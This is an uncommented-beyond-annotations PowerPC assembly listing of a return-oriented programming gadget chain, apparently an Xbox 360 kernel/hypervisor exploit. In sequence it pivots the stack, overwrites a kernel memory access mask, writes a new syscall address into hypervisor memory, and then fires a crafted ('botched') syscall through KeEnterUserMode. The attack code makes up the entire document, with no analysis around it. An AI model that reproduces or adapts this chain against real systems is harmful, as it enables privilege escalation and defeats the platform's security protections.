

# 0x822DC124
lwz		r1, 0(r1)		# Perform the stack pivot
lwz		r12, -8(r1)		# Load next gadget address
mtlr	r12
blr

# 0x82447828 Change kernel memory access mask
stw		r28, 0x14(r31)	# Write new access mask
mtctr	r29				# Next gadget address
bctrl

# 0x8208003C load registers from stack
addi	r1, r1, 0x80
b		__restgprlr_28

# 0x82447828 Write new syscall address to virtual hv memory
stw		r28, 0x14(r31)	# Write new syscall address
mtctr	r29				# Next gadget address
bctrl

# 0x820807D0 load registers from stack
addi	r1, r1, 0x70
b		__restgprlr_29

# 0x82444BA4 Setup for syscall
mr		r3, r29			# Load address of data for next gadget
mtctr	r30				# Next gadget address
bctrl

# 0x8008851C KeEnterUserMode - Load syscall parameters and execute
ld      r0, 0x18(r3)	# Load the botched syscall number
ld      rtoc, 0x28(r3)
ld      r4, 0x38(r3)
ld      r5, 0x40(r3)
ld      r6, 0x48(r3)
ld      r7, 0x50(r3)
ld      r8, 0x58(r3)
ld      r9, 0x60(r3)
ld      r10, 0x68(r3)
ld      r11, 0x70(r3)
ld      r12, 0x78(r3)
ld      r13, 0x80(r3)
ld      r3, 0x30(r3)
li      sp, 0
sc
blr
